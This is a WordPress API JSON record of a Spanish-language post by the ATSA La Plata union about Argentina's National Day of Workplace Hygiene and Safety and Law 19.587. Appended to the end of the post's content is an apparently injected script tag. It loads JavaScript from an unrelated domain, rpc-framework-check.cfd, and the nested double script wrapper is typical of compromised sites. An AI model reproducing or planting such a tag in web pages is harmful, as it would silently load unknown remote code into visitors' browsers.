{"id":18349,"date":"2025-04-21T00:00:00","date_gmt":"2025-04-21T03:00:00","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=18349"},"modified":"2026-02-02T17:15:02","modified_gmt":"2026-02-02T20:15:02","slug":"dia-nacional-de-la-higiene-y-la-seguridad-en-el-trabajo","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2025\/04\/dia-nacional-de-la-higiene-y-la-seguridad-en-el-trabajo\/","title":{"rendered":"Dia Nacional de la Higiene y la Seguridad en el trabajo"},"content":{"rendered":"\n<p>\ud83d\udcc5El 21 de abril de 1972 se sancion\u00f3 en Argentina la Ley 19.587 de Higiene y Seguridad en el Trabajo (reglamentada por decreto N.\u00ba 351\/79), piedra fundamental de la actual normativa en materia de prevenci\u00f3n de accidentes laborales en el pa\u00eds.<\/p>\n\n\n\n<p>Cada a\u00f1o, este d\u00eda busca reforzar la problem\u00e1tica de los riesgos y la seguridad de las personas en el \u00e1mbito laboral, promoviendo una cultura de la prevenci\u00f3n mediante la educaci\u00f3n, la sensibilizaci\u00f3n y la anticipaci\u00f3n. Recordando la importancia de proteger la vida y la integridad psicof\u00edsica de los trabajadores\/as.<\/p>\n\n\n\n<p>#SanidadAtsaLaPlata #SiempreJuntoAVos<\/p>\n\n\n\n<p><\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>\ud83d\udcc5El 21 de abril de 1972 se sancion\u00f3 en Argentina la Ley 19.587 de Higiene&#8230;<\/p>\n","protected":false},"author":2,"featured_media":18350,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[146,98,147,97,85,148],"tags":[],"class_list":["post-18349","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-destacado","category-home","category-novedades","category-sec-de-cultura","category-sec-de-prensa","category-ultimas-noticias"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18349","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=18349"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18349\/revisions"}],"predecessor-version":[{"id":20836,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18349\/revisions\/20836"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media\/18350"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=18349"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=18349"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=18349"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}